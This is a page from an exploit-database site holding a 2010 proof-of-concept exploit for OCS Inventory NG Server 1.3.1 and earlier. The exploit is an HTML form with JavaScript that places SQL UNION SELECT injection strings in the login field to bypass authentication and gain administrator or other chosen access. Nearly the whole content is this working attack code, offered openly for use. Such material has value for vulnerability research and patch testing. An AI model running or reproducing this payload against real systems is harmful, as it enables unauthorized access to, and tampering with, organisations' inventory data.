0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass
===================================================================== OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass ===================================================================== <!-- ____________________________________________________________________________________________________ OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass ____________________________________________________________________________________________________ Software : Open Computer and Software (OCS) Inventory NG Download : http://www.ocsinventory-ng.org/ Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com) Discover : 2010-02-05 Published : 2010-02-17 Version : 1.3.1 and prior (except 1.02.1 to 1.02.3) Impact : Manipulation of data Remote : Yes (No authentication is needed) ____________________________________________________________________________________________________ --> <html> <head> <title>OCS Inventory NG <= 1.3.1 (login) Remote Authentication Bypass</title> <script> function $(id) { return document.getElementById(id); } function $$(id) { return $(id).options[$(id).options.selectedIndex].value; } function bypass() { $('log').action = $('ocsreports').value + $$('meth') + '?lang=' + $$('lang'); if ($$('type') == 0) $('login').value = "' UNION SELECT id, accesslvl, '' FROM operators WHERE id='" + $('user').value; else $('login').value = "' UNION SELECT '" + $('user').value + "', '" + $$('type') + "', '"; $('pass').value = ""; if ($$('meth') == 'header.php') alert('Please go to "' + $('ocsreports').value + '" (or click on the OCS logo) !'); } </script> </head> <body> <form name="log" id="log" action="#" method="post"> <table align="center" border="0" width="450px"> <tr> <td><b>OCSReports :</b></td> <td> <input type="text" id="ocsreports" size="40" value="http://127.0.0.1/ocsreports/" /> </td> </tr> <tr> <td><b>Version :</b></td> <td><select id="meth"> <option value="index.php" selected><= 1.02 --- 1.3b2 <=> 1.3b3</option> <option value="header.php"><= 1.0 (4100) --- 1.3b2 <=> 1.3.1</option> </select> </td> </tr> <tr> <td><b>Login :</b></td> <td><input type="text" id="user" size="40" value="admin" /></td> </tr> <tr> <td><b>Type :</b></td> <td><select id='type'> <option value=0>Default (if login exists)</option> <option value=1>Administrator</option> <option value=2>User</option> <option value=3>Local user</option> </select></td> </tr> <tr> <td><b>Language :</b></td> <td><select id="lang"> <option value="english" selected>English</option> <option value="french">French</option> <option value="german">German</option> <option value="spanish">Spanish</option> </select> </td> </tr> <tr> <td><input type="hidden" name="login" id="login" /> <input type="hidden" name="pass" id="pass" /></td> <td><input type="submit" name="subLogin" onclick="bypass();"></td> </tr> </table> </form> </body> </html> # 0day.today [2024-07-05] #